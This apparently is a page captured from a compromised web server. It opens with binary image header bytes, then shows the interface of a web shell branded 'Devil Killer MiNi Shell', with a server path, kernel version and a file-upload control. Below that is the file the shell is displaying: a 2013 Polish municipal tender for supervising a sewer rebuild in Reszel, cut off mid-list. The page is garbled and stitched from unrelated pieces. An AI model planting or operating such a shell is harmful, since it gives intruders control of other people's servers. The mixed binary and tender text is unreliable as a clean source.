JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/297292-N-2013.html

<p class="kh_header"><b>Reszel: Obsługa inwestorska zadania :
Przebudowa odcinka sieci kanalizacji sanitarnej Święta Lipka - Reszel z obejściem Osiedla nad Sajną</b><br>
<b>Numer ogłoszenia: 297292 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Reszel , Rynek 24, 11-440 Reszel, woj. warmińsko-mazurskie, tel. 89 755 00 31, faks 89 7550031.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugreszel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa inwestorska zadania :
Przebudowa odcinka sieci kanalizacji sanitarnej Święta Lipka - Reszel z obejściem Osiedla nad Sajną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest : usługa nadzoru budowlanego
1.2. Przedmiotem zamówienia jest świadczenie usług polegających na zarządzaniu, kontroli i nadzorze nad realizacją umowy o roboty budowlane, zwanej w dalszej części umową której przedmiotem jest Przebudowa odcinka sieci kanalizacji sanitarnej Święta Lipka - Reszel z obejściem Osiedla nad Sajną. 
Zadanie to jest częścią inwestycji: Zewnętrzna sieć kanalizacji sanitarnej-grawitacyjnej i tłocznej z infrastrukturą techniczną dla miejscowości Robawy oraz przebudowy odcinka kanalizacji sanitarnej Święta Lipka - Reszel z obejściem osiedla nad Sajna w Reszlu i obejmuje przebudowę i budowę nowego odcinka kanalizacji tłocznej między przebudowaną studnią Kz-2 a przepompownią miejską Pm-1 w Reszlu (rys. 3 i 4 projektu budowlanego).
1.3. Roboty budowlane jak i nadzór inwestorski nad nimi dofinansowane są ze środków Europejskiego Funduszu Rozwoju Regionalnego w  ramach Programu Operacyjnego Warmia i Mazury na lata 2007-2013
1.4. Przedstawiciele Zamawiającego będą działali zgodnie z rolą jaką im przypisano w zakresie uprawnień i obowiązków określonych w niniejszym opisie przedmiotu zamówienia oraz wynikających z aktualnych przepisów ustawy Prawo budowlane.
1.5. Zamawiający powierzy Inspektorowi nadzoru zarządzanie, kontrolę i nadzór nad realizacją umowy, o której mowa w pkt 1.2. , w celu skutecznego wyegzekwowania od Wykonawcy robót budowlanych wymagań dotyczących jakości stosowanych materiałów i robót, kosztów realizacji robót oraz wykonania obiektu zgodnie z dokumentacją projektową, w ustalonym w umowie z Wykonawcą robót terminie.
1.6. Dokumentacja Zamawiającego:
a) Zamawiający przekaże Inspektorowi nadzoru, na czas pełnienia nadzoru, następujące dokumenty : 
- kopię umowy o roboty budowlane,
- kopię kosztorysu ofertowego,
- dokumentację projektową wraz ze specyfikacjami technicznymi,
- kopie decyzji administracyjnych pozwalających na realizację umowy na roboty
budowlane,
- kopie innych będących w jego posiadaniu  dokumentów składających się 
na umowę, 
- Zamawiający poinformuje Inspektora nadzoru o umowach cywilno-prawnych i znanych mu wymaganiach prawnych i administracyjnych mających wpływ na realizację tejże umowy.
1.7. Zakres działań
    1) Obowiązki ogólne
        Inspektor nadzoru będzie odpowiedzialny za:
a) pełnienie funkcji inspektora nadzoru inwestorskiego zgodnie z przepisami polskiego prawa i postanowieniami odpowiednich pozwoleń na prowadzenie budowy,
b) wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją  umowy,
c) prowadzenie sprawozdawczości oraz rozliczeń, 
d) Inspektor nadzoru, będzie działał we współpracy z Zamawiającym i na jego rzecz w całym okresie określonym w opisie przedmiotu zamówienia,
e) Zamawiający wyznaczy ze swojego personelu osoby odpowiedzialne za realizację umowy i współpracę z Inspektorem nadzoru,
f) Inspektor nadzoru zapewni stałą wymianę informacji z Zamawiającym oraz koordynację swojej działalności z wymaganiami Zamawiającego,
g) w przypadku, gdyby postęp robót budowlanych nie był zadowalający z przyczyn niezależnych od Wykonawcy robót, do jego obowiązków będzie należało poinformowanie Zamawiającego za pośrednictwem wyznaczonych osób o wszystkich środkach, które należy podjąć w celu zaradzenia zaistniałej sytuacji oraz wypełnienia zobowiązań wynikających z umowy o roboty budowlane.
2) Etap budowy, tj. okres od dnia podpisania umowy z Wykonawcą robót do dnia odbioru ostatecznego i przekazania do eksploatacji Inspektor nadzoru jest upoważniony i zobowiązany do:
-reprezentowania Zamawiającego w kontaktach z osobami trzecimi w sprawach  związanych z umową,
-swobodnego dostępu do terenu  budowy oraz wszelkich miejsc gdzie materiały  i urządzenia będą pozyskiwane, wytwarzane, montowane, składowane lub przygotowywane do wbudowania,
-przekazania terenu i wprowadzenia Wykonawcy robót na teren budowy,
- prowadzenia regularnych, minimum 2 razy w tygodniu, inspekcji na terenie budowy w celu sprawdzenia jakości  wykonywanych robót oraz wbudowywanych materiałów, zgodnie z wymaganiami specyfikacji technicznych,  dokumentacji projektowej oraz praktyką inżynierską,
- kontrolowania przestrzegania przez Wykonawcę robót zasad bezpieczeństwa pracy i utrzymania porządku na terenie budowy,
- udzielania Wykonawcy robót wszelkich dostępnych informacji i wyjaśnień dotyczących umowy,
- kontroli zgodności oznakowania robót z zatwierdzonym projektem tymczasowej organizacji ruchu,
- wnioskowania o usunięcie z terenu budowy każdej osoby zatrudnionej przez Wykonawcę robót, która zachowuje się niewłaściwie lub jest niekompetentna,
- organizacji oraz przewodniczenia naradom dotyczącym postępu robót (w razie potrzeby) w których udział biorą przedstawiciele wszystkich zaangażowanych  w realizację umowy stron (Zamawiający, Inspektor nadzoru, Wykonawca robót oraz inni przedstawiciele firm biorących udział w realizacji budowy),
- organizowania narad technicznych (zgodnie z potrzebami) oraz sporządzania protokółów z tych narad i przekazywania ich Zamawiającemu i Wykonawcy robót w terminie 7 dni od dnia narady,
- monitorowania postępu robót poprzez sprawdzanie ich rzeczywistego zaawansowania i zgodności realizacji z obowiązującym przy realizacji umowy harmonogramem robót,
- kontroli sposobu składowania i przechowywania materiałów,
- nadzorowania badań materiałów i robót  wykonywanych przez Wykonawcę robót,
- zlecania Wykonawcy robót wykonania dodatkowych badań materiałów lub robót budzących wątpliwość co do ich jakości,
- dokonywania obmiaru wykonanych robót,
- odbioru robót zanikających i ulegających zakryciu,
- sprawdzenia wykonanych robót i powiadomienia Wykonawcy robót o wykrytych wadach oraz określenia zakresu koniecznych do wykonania robót poprawkowych,
- poświadczenia usunięcia wad przez Wykonawcę robót,
- przygotowania do odbioru robót, sprawdzenia kompletności i prawidłowości przedłożonych przez Wykonawcę robót dokumentów, wymaganych do odbioru oraz uczestnictwo w odbiorze robót i przekazaniu do eksploatacji, 
- sprawdzenia i potwierdzania zestawień ilości i wartości wykonanych robót,
- poświadczenia terminu zakończenia robót,
- dostarczenia Zamawiającemu wszelkich raportów, akt, certyfikatów przygotowanych przez Wykonawcę robót po zakończeniu robót,
- zapobiegania roszczeniom Wykonawcy robót,
- powiadomienia Zamawiającego o wszelkich roszczeniach Wykonawcy robót oraz rozbieżnościach między dokumentacją Zamawiającego a stanem faktycznym na terenie budowy
- odpowiednio wyprzedzającego informowania Zamawiającego o wszelkich zagrożeniach występujących podczas realizacji robót, które mogą mieć wpływ na wydłużenie czasu wykonania lub zwiększenia kosztów, 
-sprawdzenia ostatecznej kwoty należnej Wykonawcy robót,
-rozliczenia umowy o roboty budowlane w przypadku jej wypowiedzenia,
- przygotowywania niezbędnych dokumentów do uzyskania przez Zamawiającego pozwolenia na użytkowanie (o ile jest wymagane),
- udziału w rozwiązywaniu wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją umowy,
- dokonywania inspekcji i nadzór nad robotami zaległymi oraz robotami    niezbędnymi do usunięcia wad,
- odbioru wykonanych robót związanych z usunięciem wad,
- wspierania Zamawiającego w negocjacjach dotyczących nierozstrzygniętych   roszczeń i sporów,
- przygotowania końcowego rozliczenia umowy i sporządzania sprawozdania końcowego z realizacji zadania.
3) Inspektor nadzoru będzie brał udział w przeglądach, kontrolach i odbiorach  w okresie gwarancji i rękojmi.
4) Inspektor nadzoru w porozumieniu z Zamawiającym, będzie decydować o :
a) dopuszczeniu materiałów, prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót,
b) wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu lub   niezgodnie z wymaganiami umowy,
5) Inspektor nadzoru będzie wnioskować do Zamawiającego o:
     a) wprowadzenie zmian w dokumentacji projektowej,
     b) zlecenie usunięcia wad stronie trzeciej w przypadku gdy Wykonawca robót nie usunie ich w wyznaczonym terminie,
     c) zmianę terminu wykonania robót w umowie o roboty budowlane, jeżeli zmiana taka nie wynika z winy czy zaniedbań Wykonawcy robót,
d) zlecenie wykonania robót dodatkowych w uzgodnieniu z Zamawiającym.
6) Inspektor nadzoru będzie akceptować:
      a)  przedstawiony przez Wykonawcę robót harmonogram robót,
      b)  propozycję Wykonawcy robót odnośnie zmiany kierownika budowy lub robót na inną osobę niż wskazana w ofercie Wykonawcy robót; 
7) Obowiązki w zakresie funkcji Inspektora nadzoru dotyczących rozliczania budowy.
    a) bieżące rozliczanie wykonawcy za wykonane roboty, a w szczególności :
        - przejmowanie od wykonawcy, wycenionego zestawienia robocizny, materiałów  i sprzętu wykonawcy,
        - ustalenie poprzez pomiary i potwierdzenie wartości robót wykonanych, za które wykonawca powinien otrzymać zapłatę,
        - sprawdzenie i zatwierdzenie faktur częściowych jak i końcowych stwierdzających wysokość kwoty, która jako ostateczna należna jest wykonawcy zgodnie z umową,
8) Współpraca z Zamawiającym
a)Na każdym etapie realizacji umowy, Inspektor nadzoru zapewni Zamawiającemu wszelką niezbędną pomoc w zakresie zarządzania umową
9) Inspektor nadzoru uzyska zgodę Zamawiającego przed podjęciem następujących działań:
a) wyrażeniem zgody na podzlecenie przez Wykonawcę części robót Podwykonawcom innym, niż wskazani w ofercie,
b) przedłużeniem przewidzianego w umowie czasu na wykonanie robót,
c) zawieszeniem prowadzenia części lub całości robót z przyczyn, które nie leżą po stronie Wykonawcy robót,
d) wyceną robót dodatkowych,
e) wprowadzeniem jakichkolwiek zmian w umowie np.: zmian ilości, jakości, parametrów elementów, pominięcia części robót, kolejności i terminu wykonania robót,
f) zmianą ceny kosztorysowej wynikającą z potrzeby wykonania robót nieprzewidzianych lub dodatkowych,
g) zmianą ceny kosztorysowej i terminu wykonania umowy wynikającą z takich zmian przepisów prawa, które spowodują opóźnienie Wykonawcy robót lub poniesieniem przez Wykonawcę robót dodatkowych kosztów,
h) zmianą ceny kosztorysowej i/lub terminu wykonania umowy na skutek wystąpienia zagrożeń stanowiących ryzyko Zamawiającego,
i) zatwierdzeniem i/lub odrzuceniem roszczeń Wykonawcy robót.
10) Wymagania
Nadzór nad realizacją umowy będzie powierzony osobie wskazanej w ofercie Inspektora nadzoru, zwanym w dalszej treści  Inspektorem nadzoru. 
Wskazana osoba - Inspektor nadzoru musi posiadać uprawnienia budowlane w zakresie przedmiotu zamówienia.
11) Raporty
Po zakończeniu robót, Inspektor nadzoru przedłoży Zamawiającemu -Raport końcowy zawierający m.in. informacje o :
- zmianach projektowych w trakcie realizacji,
                  - uwagach do wykonania poszczególnych głównych elementów robót,
- osiągniętej jakość robót w zgodności ze specyfikacjami technicznymi,
- przyczynach wystąpienia wad,
- sprawach umowy o roboty budowlane i zmiany :
  - czasie trwania umowy o roboty budowlane,
  -roszczeniach
- sprawach finansowych :
 - przyczynach zmiany ceny umownej
 - końcowym rozliczeniu ilościowym wykonanych robót
12) Płatności
Wynagrodzenie za pełnienie funkcji Inspektora nadzoru może następować :
   a) jednorazowo 
   b) lub okresowo w trakcie realizacji umowy w wysokości proporcjonalnej do procentowego zaawansowania robót budowlanych, 
W przypadku rozliczania okresowego wysokość wynagrodzenia Inspektora nadzoru będzie zależna od rozliczeń wykonawcy robót budowlanych.
Podstawą rozliczenia i wystawienia faktury, rachunku za wykonaną usługę będzie zatwierdzona faktura do zapłaty dla wykonawcy robót budowlanych.
  - Faktury okresowe wypłacane będą w wysokości łącznej do 80 % ceny ofertowej,
 - Faktura końcowego rozliczenia o wartości nie mniejszej niż 20 % ceny ofertowej - zostanie zapłacona za wykonanie usługi Inspektora nadzoru po zakończeniu robót budowlanych, odbiorze końcowym.
14) Usługa obejmuje nadzór nad następującym zadaniem :
Przebudowa odcinka sieci kanalizacji sanitarnej Święta Lipka - Reszel 
z obejściem Osiedla nad Sajną
Wartość zadania wg kosztorysu inwestorskiego wynosi : 208 817,82 zł netto
15) Szczegółowy zakres robót objętych niniejszym zamówieniem określa dokumentacja projektowa (dostępna w wersji papierowej do wglądu w siedzibie Zamawiającego), specyfikacje techniczne wykonania i odbioru robót budowlanych oraz przedmiary robót oraz w wersji elektronicznej na stronie Zamawiającego: http://bip.warmia.mazury.pl/reszel_gmina_miejsko_-_wiejska                                                     
16) Dokumentacja w wersji papierowej dostępna jest do wglądu w siedzibie Zamawiającego, od poniedziałku do piątku od godz. 8.00 do godz. 14.00
17) Uczestnik przetargu jest zobowiązany do wizyty miejsca realizacji robót i jego otoczenia, w celu oszacowania na własną odpowiedzialność kosztów i ryzyka oraz uzyskania wszelkich danych, jakie mogą być niezbędne w przygotowaniu oferty i podpisaniu umowy na wykonanie usługi.
18) Przedmiot zamówienia dla robót budowlanych określa dokumentacja :
           a) Zewnętrzna sieć kanalizacji sanitarnej-grawitacyjnej i tłocznej z infrastrukturą techniczną dla miejscowości Robawy oraz przebudowy odcinka kanalizacji sanitarnej Święta Lipka - Reszel z obejściem osiedla nad Sajna w Reszlu
           b) Specyfikacje techniczne wykonania i odbioru robót budowlanych.
19)  Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie
z warunkami zawartymi w opisie przedmiotu zamówienia, projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót budowlanych, warunkami pozwolenia na budowę, obowiązującymi przepisami i Polskimi Normami, wzorze umowy i przedmiarach robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie      Wykonawca zobowiązany jest wskazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże: przynajmniej 2 usługi  w pełnieniu funkcji Inspektora Nadzoru w zakresie sieci instalacji wodociągowych i kanalizacyjnych o wartości robót budowlanych co najmniej 150 000 zł netto każda.
Doświadczenie powinno być potwierdzone dowodami, z których wynika odpowiednio ich wartość  oraz, że usługi zostały wykonane lub są wykonywane z należytą starannością i rzetelnością.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie      Wykonawca zobowiązany jest wskazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania niezbędnymi osobami warunek zostanie spełniony jeżeli   Wykonawca wykaże, iż dysponuje:
- minimum 1 osobą, która będzie pełniła funkcję Inspektora Nadzoru  z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie wcześniej obowiązujących przepisów.
      Osoba w/w musi mieć co najmniej 5 lat doświadczenia zawodowego w kierowaniu budową jako kierownik budowy, w tym co najmniej 3 lata pracy na stanowisku Inspektora Nadzoru (tj. po uzyskaniu uprawnień).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie      Wykonawca zobowiązany jest wskazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - zał. nr 1 do SIWZ
2) Oświadczenie oferenta o spełnieniu warunków udziału w postępowaniu -zał. nr 2 do SIWZ
3) Oświadczenie o podwykonawstwie - zał. nr 9 do SIWZ (jeśli dotyczy)
4) Pisemne zobowiązanie innych podmiotów (jeśli dotyczy)
5) Pełnomocnictwo (jeśli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmianę postanowień umowy zgodnie z wymogami art.  144 ustawy Prawo zamówień publicznych w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy tj:
1) terminu realizacji zamówienia, terminów dokonania poszczególnych czynności wskazanych w umowie, w następujących sytuacjach :
a) w przypadku opóźnienia w rozpoczęciu lub realizacji robót budowlanych lub dostaw, odbiorach robót, uzyskaniu pozwolenia na użytkowanie, rozliczeniu inwestycji - o ile opóźnienie nie wynika z przyczyn leżących po stronie Wykonawcy,
b) wydłużenia inwestycji z przyczyn niezależnych od Wykonawcy,
c)  w przypadku wystąpienia robót dodatkowych niezbędnych do wykonania inwestycji, których realizacja wymaga zmiany terminu wykonania inwestycji o czas ich realizacji,
d) zmian w dokumentacji projektowej mających wpływ na termin wykonania inwestycji,
e) w razie zakłócenia toku robót budowlanych przez protesty społeczne i ingerencje osób trzecich oraz wstrzymanie budowy przez organ nadzoru budowlanego i inne organy nadzoru, ale tylko po stwierdzeniu zaniedbań niezawinionych przez Wykonawcę,
f) jeżeli w otoczeniu budowy rozpoczęto realizację robót, które uniemożliwiają dostęp do placu budowy lub z przyczyn praktycznych, roboty w otoczeniu placu budowy powinny być wykonane wcześniej.
g) w razie braku możliwości wykonania zamówienia zgodnie z dostarczoną dokumentacją i przekazanym placem budowy,
h) w przypadku wystąpienia siły wyższej - zmiana wymaga zgody obu stron. Przez siłę wyższą rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i którym nie mogły przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidziana dla cywilnoprawnych stosunków zobowiązaniowych.
i) podstawą do ustalenia nowego terminu będzie ilość dni przewidziana przez Wykonawcę w harmonogramie finansowo - rzeczowym na wykonanie danego elementu zamówienia.
2) w przypadku wystąpienia innych nieprzewidzianych okoliczności, powodujących konieczność zmiany terminu/terminów,
3) pozostałym, w szczególności :
  a) korzystnym dla Zamawiającego,
  b) nieprzewidywalnym na etapie wszczęcia postępowania, którego wprowadzenie jest niezbędne do realizacji zamówienia.
4) Zmiana danych podmiotowych dotyczących Inspektora nadzoru, lokalizacji siedziby biura,
5) Zmiana danych osobowych - zmian osób opisanych w § umowy - za uprzednią zgodą Zamawiającego.
6) Warunki zmian :
